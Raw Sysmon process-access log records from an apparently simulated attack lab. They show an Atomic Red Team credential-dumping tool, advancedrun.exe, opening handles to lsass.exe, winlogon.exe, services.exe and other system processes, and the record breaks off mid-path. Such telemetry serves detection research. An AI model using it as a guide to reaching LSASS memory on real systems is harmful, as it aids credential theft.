17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomic